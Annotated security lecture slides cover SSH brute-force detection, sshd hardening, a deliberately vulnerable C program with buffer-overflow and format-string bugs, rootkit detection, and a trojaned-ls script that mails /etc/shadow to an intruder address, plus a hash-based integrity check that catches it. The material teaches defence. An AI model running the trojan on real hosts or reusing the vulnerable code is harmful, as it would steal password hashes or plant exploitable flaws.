The pattern to read here is one source host (89.235.152.18) trying several account names that do not exist on the machine (oracle, test, cvsuser) a few seconds apart: a dictionary attack. The "POSSIBLE BREAK-IN ATTEMPT" line only means that the reverse DNS name of the client does not resolve back to its address; on its own it is not evidence of a compromise.
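As an added example (not part of the slides), the detection a practitioner would run over this log: count "Failed password" lines per source address and report every address at or above a threshold. The sample lines are the ones on the slide above plus one constructed control line from 203.0.113.7, which stays below the threshold; the function name and output format are my own.

```shell
# Added example (not from the slides): counts failed SSH logins per source IP
# in auth.log lines and reports sources at or above a threshold. The first
# lines are the ones shown on the slide; the 203.0.113.7 line is a
# constructed control entry that stays below the threshold.
SAMPLE_AUTH_LOG=$(cat <<'EOF'
Dec 24 01:24:46 golden-laptop sshd[23906]: Invalid user oracle from 89.235.152.18
Dec 24 01:24:48 golden-laptop sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 golden-laptop sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:04 golden-laptop sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:22 golden-laptop sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:30:00 golden-laptop sshd[24001]: Failed password for root from 203.0.113.7 port 50000 ssh2
EOF
)

# Usage: ssh_bruteforce_report THRESHOLD < auth.log
# Prints "IP failed=N distinct_users=M" for every IP with N >= THRESHOLD,
# sorted by IP so the output is stable.
ssh_bruteforce_report() {
  awk -v thr="${1:-5}" '
    /sshd\[[0-9]+\]: Failed password for/ {
      # The source IP follows the word "from"; the account name precedes it.
      for (i = 1; i <= NF; i++) {
        if ($i == "from") { ip = $(i + 1); user = $(i - 1) }
      }
      failed[ip]++
      if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
    }
    END {
      for (ip in failed) {
        if (failed[ip] >= thr) {
          printf "%s failed=%d distinct_users=%d\n", ip, failed[ip], users[ip]
        }
      }
    }
  ' | sort
}

# Stand-alone demo: three failures against three different accounts from one
# host is the dictionary-attack pattern from the slide.
printf '%s\n' "$SAMPLE_AUTH_LOG" | ssh_bruteforce_report 3
```

The distinct-user count is what separates a dictionary attack (many accounts, one source) from a legitimate user mistyping one password; a real deployment would feed the report into the firewall rule mentioned on the next slide.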
60. SSH defence
iptables (restrict or rate-limit port 22)
Stronger passwords
RSA key authentication
61. SSH passwords
Minimum of 8 characters
Non-trivial passwords
Alphanumeric combinations
Mnemonic: "Um Whiskey-Cola vale 3 euros no BA!" ("A whisky and coke costs 3 euros at the BA!") = "UW-Cv3enBA!"
62. SSH
http://www.passwordmeter.com/ (a strength meter; do not type a password you actually use into a third-party site)
63. SSH - RSA authentication
1. Generate the key pair with the command "ssh-keygen -t rsa". This creates the files ~/.ssh/id_rsa (private key) and ~/.ssh/id_rsa.pub (public key).
2. On each machine we want to connect to (destination), add the generated id_rsa.pub to ~/.ssh/authorized_keys by appending its contents, for example: "cat id_rsa.pub >> ~/.ssh/authorized_keys".
3. On each machine we connect from (origin), place id_rsa in ~/.ssh/. The private key is the secret: keep it at mode 600, and prefer generating a separate key pair on each origin machine over copying one private key around.
4. All that remains is to disable password-based login by adding the line "PasswordAuthentication no" to /etc/ssh/sshd_config and then restarting the sshd daemon with "/etc/init.d/sshd restart". Check the file first with "sshd -t" and keep an existing session open until a key-based login has been confirmed, so a typo cannot lock you out.
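The four steps above as shell functions, added here as an example and not taken from the slides. The functions are exercised against a throwaway directory rather than a live ~/.ssh and /etc/ssh/sshd_config; the public key string and the sshd_config contents in the demo are constructed placeholders, and the function names are my own.

```shell
# Added example (not from the slides): the key-based login steps from the
# slide as shell functions, run against a temporary directory instead of a
# live ~/.ssh and /etc/ssh/sshd_config. The public key used in the demo is a
# constructed placeholder, not a real key.

# Step 1 on a real host (not run in the demo, which must work without
# ssh-keygen installed):
generate_keypair() {
  ssh-keygen -t rsa -b 4096 -f "$1" -N ""
}

# Step 2: append a public key to authorized_keys on the destination host,
# once only, with the permissions sshd's StrictModes requires (700 on the
# directory, 600 on the file).
install_pubkey() {
  pubkey="$1"; authorized="$2"
  mkdir -p "$(dirname "$authorized")"
  chmod 700 "$(dirname "$authorized")"
  touch "$authorized"
  chmod 600 "$authorized"
  grep -qxF "$pubkey" "$authorized" || printf '%s\n' "$pubkey" >> "$authorized"
}

# Step 4: turn off password logins in an sshd_config file. An existing
# directive (commented out or not) is rewritten in place; a missing one is
# appended. ChallengeResponseAuthentication is disabled as well, otherwise
# PAM's keyboard-interactive prompt still accepts a password.
disable_password_auth() {
  cfg="$1"
  for directive in PasswordAuthentication ChallengeResponseAuthentication; do
    sed "s/^#*[[:space:]]*$directive[[:space:]].*/$directive no/" "$cfg" > "$cfg.tmp"
    mv "$cfg.tmp" "$cfg"
    grep -q "^$directive no\$" "$cfg" || printf '%s no\n' "$directive" >> "$cfg"
  done
}

# Stand-alone demo on a temporary directory (constructed inputs).
DEMO_DIR=$(mktemp -d)
DEMO_PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCplaceholder demo@honeypot"
printf '#PasswordAuthentication yes\nPort 22\n' > "$DEMO_DIR/sshd_config"
install_pubkey "$DEMO_PUBKEY" "$DEMO_DIR/.ssh/authorized_keys"
install_pubkey "$DEMO_PUBKEY" "$DEMO_DIR/.ssh/authorized_keys"   # second call is a no-op
disable_password_auth "$DEMO_DIR/sshd_config"
cat "$DEMO_DIR/.ssh/authorized_keys" "$DEMO_DIR/sshd_config"
# On a real host, validate before reloading and keep a session open:
#   sshd -t && /etc/init.d/sshd restart
```

Rewriting a commented-out directive rather than blindly appending matters because sshd takes the first occurrence of a keyword, so an appended "PasswordAuthentication no" below an uncommented "PasswordAuthentication yes" would be ignored.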
64. Vulnerabilities
Behaviour not foreseen in a software artefact:
Buffer overflow
Unvalidated input
SQL injection
65. Exploiting vulnerabilities
Exploit: the name given to a piece of code that takes advantage of flaws in applications to make them behave in a way that was not anticipated.
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[10];

    if (argc < 2)
        return 1;               /* added: the original crashes when run with no argument */
    strcpy(buffer, argv[1]);    /* no bounds check: more than 9 bytes overflow the stack */
    printf(buffer);             /* format-string bug: argv[1] is used as the format string */
    return 0;
}
66. Buffer Overflow
user@honeypot:~$ gcc exploit.c -o exploit
user@honeypot:~$ ./exploit thisisanexploit
*** stack smashing detected ***: ./exploit terminated
thisisanexploitAborted
One of gcc's defence mechanisms: the stack protector (-fstack-protector, on by default in Ubuntu's gcc) places a canary value between the buffer and the saved return address and checks it when main returns. The 15-byte argument overwrites the canary, so the program is aborted instead of returning into attacker-controlled data. The check only fires at function return and only covers the overflow; the printf(buffer) format-string bug is untouched by it.
67. Shellcode
A set of instructions (in machine code or otherwise) written so that they can be injected into an application at run time.
Illegal access to an unauthorised memory area
Injection of the shellcode
68. Rootkits
A set of malicious programs (trojans, backdoors, ...)
Detection: chkrootkit and rkhunter (Linux)¹; RootkitRevealer (Windows).
¹ Both available from Ubuntu's package manager.
69. Trojaned ls
#!/bin/bash
mv /bin/ls /bin/ls.old
/bin/echo "cat /etc/shadow | mail intruso@intruso.pt" > /bin/ls
/bin/echo "/bin/ls.old" >> /bin/ls
chmod +x /bin/ls
Every run of ls now mails the password hashes to the intruder before calling the original binary. The wrapper is crude (it drops ls's arguments and leaves ls.old lying around), but the replacement is exactly what a file-integrity check against a known-good baseline catches.
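An integrity check that catches this replacement, added here as an example and not part of the slides: record a SHA-256 baseline for the binary while the system is known good, then re-check both the hash and the ELF magic, since a shell-script wrapper in place of a compiled binary no longer starts with 0x7f 'E' 'L' 'F'. The demo runs in a temporary directory on a constructed fake "ls" and applies the slide's trojan to that file, so it never touches the real /bin/ls; the function names and the baseline file format are my own.

```shell
# Added example (not from the slides): a baseline-and-recheck integrity test
# that detects the trojaned ls from the slide. The demo works on a constructed
# fake binary in a temporary directory, not on /bin/ls.

# Hex SHA-256 of a file; sha256sum (coreutils) with shasum as a fallback.
file_sha256() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1"
  else
    shasum -a 256 "$1"
  fi | cut -d' ' -f1
}

# Baseline format: one "<sha256> <path>" line per file, recorded while the
# system is known good (ideally kept off-host: a rootkit can edit it too).
record_baseline() {
  printf '%s %s\n' "$(file_sha256 "$1")" "$1" >> "$2"
}

# True when the first four bytes are the ELF magic 7f 45 4c 46.
is_elf() {
  [ "$(od -An -tx1 -N4 "$1" | tr -d ' \t\n')" = "7f454c46" ]
}

# Prints OK, or a comma-separated list of findings, and returns 1 on any finding.
check_binary() {
  path="$1"; baseline="$2"; findings=""
  expected=$(awk -v p="$path" '$2 == p { print $1 }' "$baseline")
  [ "$expected" = "$(file_sha256 "$path")" ] || findings="hash-mismatch"
  is_elf "$path" || findings="${findings:+$findings,}not-elf"
  if [ -z "$findings" ]; then echo OK; return 0; fi
  echo "$findings"; return 1
}

# Stand-alone demo (constructed stand-in for /bin/ls: ELF header plus filler).
DEMO_BIN=$(mktemp -d)
printf '\177ELF\002\001\001fake-ls-body\n' > "$DEMO_BIN/ls"
chmod 755 "$DEMO_BIN/ls"
record_baseline "$DEMO_BIN/ls" "$DEMO_BIN/baseline.txt"
check_binary "$DEMO_BIN/ls" "$DEMO_BIN/baseline.txt"          # OK

# The slide's trojan, with /bin rewritten to the temporary directory.
mv "$DEMO_BIN/ls" "$DEMO_BIN/ls.old"
printf '%s\n' "cat /etc/shadow | mail intruso@intruso.pt" > "$DEMO_BIN/ls"
printf '%s\n' "$DEMO_BIN/ls.old" >> "$DEMO_BIN/ls"
chmod +x "$DEMO_BIN/ls"
check_binary "$DEMO_BIN/ls" "$DEMO_BIN/baseline.txt" ||
  echo "$DEMO_BIN/ls has been replaced"                      # hash-mismatch,not-elf
```

The hash comparison is the real control; the ELF-magic check is a cheap second signal that also flags a wrapper written over a binary whose baseline was never recorded. Both depend on the baseline and the checking tools themselves being trustworthy, which is why chkrootkit and rkhunter on the previous slide prefer to run from clean media.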
70. Conclusion